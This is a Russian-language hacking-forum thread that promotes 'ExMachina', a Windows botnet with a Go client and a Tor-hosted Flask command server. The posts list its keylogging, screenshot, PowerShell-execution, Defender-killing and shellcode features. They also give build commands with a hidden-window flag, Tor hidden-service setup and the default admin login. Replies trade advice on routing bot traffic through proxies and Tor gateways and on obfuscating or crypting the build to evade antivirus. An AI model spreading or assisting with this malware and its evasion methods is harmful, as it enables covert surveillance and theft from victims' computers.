malware ExMachina - Ботнет для Windows

[voldemort]

Привет, друзья, представляем ExMachina — ботнет для Windows, Клиент написан на языке программирования Golang, а сервер управления выполнен на языке Python с использованием веб-фреймворка Flask. , который использует сеть Tor для связи с ботами.

Функции:
- Анонимный C2C-сервер благодаря сети Tor
- Прослушивание ввода с клавиатуры пользователя
- съемка скриншотов
- Запуск команд PowerShell
- попробуйте убить процессы защитника Windows

Отмечает, что этот проект еще не завершен, так как требуется дополнительное тестирование для обхода всех существующих антивирусов, поэтому список дел - это улучшение кода, чтобы он обходил все возможные антивирусы, и добавление функции для запуска зашифрованного шелл-кода.
for the hardware you need a server for at least 4GB of ram and 2cpu cores, as for the software: Tor, nginx(optional), python, and Go
использовать:
настроить скрытый сервер tor
закодируйте весь адрес onionv3, веб-перехватчик Discord и имя исполняемого файла, потому что он попытается самостоятельно удалить
отредактируйте main.go, добавив новые данные в кодировке Base64

cd ExMachina
GOOS=windows go build -ldflags="-w -s -H=windowsgui"

выходной исполняемый файл составляет около 6,5 МБ
запустите сервер, запустив python wsgi.py(for debuging and testing python test.py), зарегистрируйте администратора (по умолчанию имя пользователя администратора — «ErenYeager», вы можете изменить его, если хотите) перейдите по маршруту /register и зарегистрируйте пароль администратора
наслаждаться

 

[Dddc]

Билд написан на golang? Я все верно понял?

 

[Dart]

можно использовать публичные тор гейтвеи (onion.ly, onion.foundation), тогда не придется подтягивать клиент. также можно использовать их в связке с прокси: бот -> прокси -> гейтвей -> hidden service, а то будет жесткий фрод ав. также можно реализовать дополнительный слой шифрования между клиентом (ботом) и сервером, поверх ssl, т.к. трафик может прослушиваться самим гейтвеем. дискорд в помойку сразу

 

[DildoFagins]

написанный на Go

Кстати, для всех, кто собирает голанг под Венду, обратите внимание, что последняя версия компилятора официально поддерживает только Windows 10 и выше. Есть некоторая вероятность, что собранный исполняемый файл будет нормально работать на более старых системах, но таки рантайм слишком жирный, чтобы быть уверенным, что ничего не отвалиться на старых системах. Поэтому, если нужна поддержка старых систем, то, наверное, стоит брать более раннюю версию компилятора.

 

[voldemort]

Билд написан на golang? Я все верно понял?

Да, клиент с использованием Golang, а сервер с использованием Python.

 

[voldemort]

можно использовать публичные тор гейтвеи (onion.ly, onion.foundation), тогда не придется подтягивать клиент. также можно использовать их в связке с прокси: бот -> прокси -> гейтвей -> hidden service, а то будет жесткий фрод ав. также можно реализовать дополнительный слой шифрования между клиентом (ботом) и сервером, поверх ssl, т.к. трафик может прослушиваться самим гейтвеем. дискорд в помойку сразу

Спасибо, брат. Я рассмотрю твои предложения для следующей версии в ближайшее время.

 

[Dddc]

Да, клиент с использованием Golang, а сервер с использованием Python.

А как можно морфить или криптовать билд?

 

[voldemort]

А как можно морфить или криптовать билд?

Что ты имеешь в виду под шифрованием морфить? Я не совсем понял, брат.

 

[Stockholm]

Друже, чуть вычитать и подредачить текст, ошибки в глаза бьются, а все остальное на высоком уровне!

 

[voldemort]

Друже, чуть вычитать и подредачить текст, ошибки в глаза бьются, а все остальное на высоком уровне!

мне нужно немного подучить русский

 

[Dddc]

мне нужно немного подучить русский

Могу помочь

 

[Dddc]

Что ты имеешь в виду под шифрованием морфить? Я не совсем понял, брат.

Виде изменение кода для снижения обнаружения анти вирусным по

 

[Stockholm]

Виде изменение кода для снижения обнаружения анти вирусным по

Не особо лучший ты помощник в русском) без обид)

 

[Stockholm]

мне нужно немного подучить русский

Пиши в личные сообщения, если нужна будет помощь. Всегда рад буду помочь.

 

[voldemort]

Виде изменение кода для снижения обнаружения анти вирусным по

Ах, хорошо, проект нуждается в некоторых улучшениях, чтобы достичь этого. У меня нет опыта в обходе антивирусов, но это может помочь.
https://github.com/burrowers/garble

 

[voldemort]

Исправление некоторых ошибок, все еще есть ошибка с клавиатурным вводом, я исправлю их позже.
Для участника, который спросил меня, как получить адрес onionv3, выполните этот сценарий Bash в вашем терминале.
Удалите комментарии из скрытой папки с хэштегами."

sudo vim /etc/tor/torrc

chmod -R 700 /var/lib/tor
systemctl enable tor
start tor with
systemctl start tor
systemctl restart tor

Теперь вы можете получить адрес, введя"

cat /var/lib/tor/hidden_service/hostname

Извините за баги, братья.

 

[voldemort]

Обновление, исправляющее небольшие ошибки и добавляющее возможность выполнения шелл-кодов.

 

[Apocalypse]

Дискорд, мама мия

 

[voldemort]

Дискорд, мама мия

Я удалил его из соображений конфиденциальности.
Теперь он попадет прямо в базу данных сервера.

 

[xiaocai]

Я чувствую интерес к вашему выбору технологий, описанных вами, особенно к тому, почему вы выбрали использовать Python в качестве языка для сервера управления, а не такой же Golang, как в клиентской части? Есть ли какие-то конкретные причины или соображения?